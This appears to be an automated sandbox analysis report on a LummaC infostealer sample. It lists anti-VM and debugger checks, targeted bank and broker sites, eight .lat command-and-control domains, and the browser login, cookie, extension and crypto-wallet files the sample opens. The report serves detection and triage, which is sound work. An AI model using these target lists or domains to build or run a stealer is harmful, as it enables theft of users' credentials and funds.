Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\	Jump to behavior
Source: C:\Users\user\Desktop\InstallSetup.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\track_prt[1].htm	Jump to behavior

Source: C7B4.tmp.exe, 00000003.00000003.1639316693.000000000310B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696494690p
Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696494690
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: InstallSetup.exe, 00000000.00000002.3922562911.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, InstallSetup.exe, 00000000.00000002.3922562911.0000000000C3E000.00000004.00000020.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp, C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000A7D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696494690f
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware-42 27 c5 9a 47 85 d6 84-53 49 ec ec 87 a6 6d 67
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000AC5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWi+
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: C7B4.tmp.exe, 00000003.00000003.1639316693.0000000003106000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

API call chain: ExitProcess graph end node

graph_3-25557

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Code function: 3_2_0043C1F0 LdrInitializeThunk,

3_2_0043C1F0

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_009700C6 mov eax, dword ptr fs:[00000030h]	0_2_009700C6
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0094092B mov eax, dword ptr fs:[00000030h]	0_2_0094092B
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00940D90 mov eax, dword ptr fs:[00000030h]	0_2_00940D90
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00C00F93 push dword ptr fs:[00000030h]	0_2_00C00F93
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_0097092B mov eax, dword ptr fs:[00000030h]	3_2_0097092B
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00970D90 mov eax, dword ptr fs:[00000030h]	3_2_00970D90
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	Code function: 3_2_00A5100B push dword ptr fs:[00000030h]	3_2_00A5100B

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0096A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0096A63A
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0095073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0095073A
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_009508CD SetUnhandledExceptionFilter,	0_2_009508CD
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: 0_2_0094FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0094FB78

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: C7B4.tmp.exe	String found in binary or memory: rapeflowwj.lat
Source: C7B4.tmp.exe	String found in binary or memory: crosshuaht.lat
Source: C7B4.tmp.exe	String found in binary or memory: sustainskelet.lat
Source: C7B4.tmp.exe	String found in binary or memory: aspecteirs.lat
Source: C7B4.tmp.exe	String found in binary or memory: energyaffai.lat
Source: C7B4.tmp.exe	String found in binary or memory: necklacebudi.lat
Source: C7B4.tmp.exe	String found in binary or memory: discokeyus.lat
Source: C7B4.tmp.exe	String found in binary or memory: grannyejh.lat

Source: C:\Users\user\Desktop\InstallSetup.exe

Process created: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe "C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: EnumSystemLocalesW,	0_2_00975034
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0097B271
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: EnumSystemLocalesW,	0_2_0097B4E9
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,	0_2_00975427
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: EnumSystemLocalesW,	0_2_0097B5CF
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: EnumSystemLocalesW,	0_2_0097B534
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,	0_2_0097B8A3
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,	0_2_0097B8AC
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0097B9D5
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetLocaleInfoW,	0_2_0097BADC
Source: C:\Users\user\Desktop\InstallSetup.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0097BBA9

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\Desktop\InstallSetup.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: Process Memory Space: C7B4.tmp.exe PID: 3032, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Electrum\wallets
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\ElectronCash\wallets
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Jaxx Liberty
Source: C7B4.tmp.exe, 00000003.00000002.1819320352.00000000030E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ExodusWeb3
Source: C7B4.tmp.exe, 00000003.00000002.1819320352.00000000030E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000A87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsAu
Source: C7B4.tmp.exe, 00000003.00000002.1818378078.0000000000B16000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C7B4.tmp.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
